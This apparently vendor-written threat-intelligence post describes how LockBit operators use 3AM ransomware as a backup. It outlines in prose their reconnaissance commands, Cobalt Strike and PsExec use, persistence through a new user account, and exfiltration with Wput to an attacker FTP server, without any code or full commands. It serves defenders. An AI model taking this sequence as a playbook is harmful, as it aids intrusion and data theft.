HQ/EMEAFind out how we can help your business
A new malicious software called 3AM ransomware has emerged in the threat landscape after appearing in one of LockBit’s cybercriminal operations. The LockBit operators employed this tool as a backup plan if their target’s defenders prevented their primary infection mechanism.
The ransomware process starts with a “gpresult” command that could extract policy settings specific to a targeted user’s system. Next, the threat actors adopt several components of the notorious Cobalt Strike framework to increase their control over the targeted network. Specifically, the attackers use the PsExec process to acquire higher privileges within the infected system.
The operators’ reconnaissance efforts go further as they execute more commands, such as “whoami,” “netstat,” “quser,” and “net share,” gathering critical information about the system and network. Furthermore, the actors will create a new user to ensure their persistence and leverage the Wput tool to exfiltrate victim files to an attacker-controlled FTP server.
LockBit’s backup plan is to launch the 3AM ransomware.
The LockBit operators launch the 3AM ransomware if they fail their attack in their first attempt. The actors deploy this ransomware on three systems within a compromised network to create more opportunities. The ransom note also explicitly states the name of the ransomware, which removes the doubt of whose threat actor executed the campaign.
The newly discovered ransomware has appeared in multiple cybercriminal operations, but it is still full of mystery. However, the LockBit ransomware and its affiliates are the primary users of the ransomware strain; hence, other cybercriminals could employ the same tool soon, potentially resulting in more attacks.
The authors of this new tool code the ransomware in the Rust programming language, a new trend for malware developers for creating ransomware. Therefore, organisations and cybersecurity providers should invest more in thorough investigations of Indicators of Compromise (IOCs) linked to this ransomware strain to bolster their defences.
Every entity should adopt a modern Threat Intelligence Platform (TIP) service since it could enhance detection mechanisms and investigation capabilities. Organisations should prioritise acquired real-time protection services to prevent such campaigns and protect digital assets.
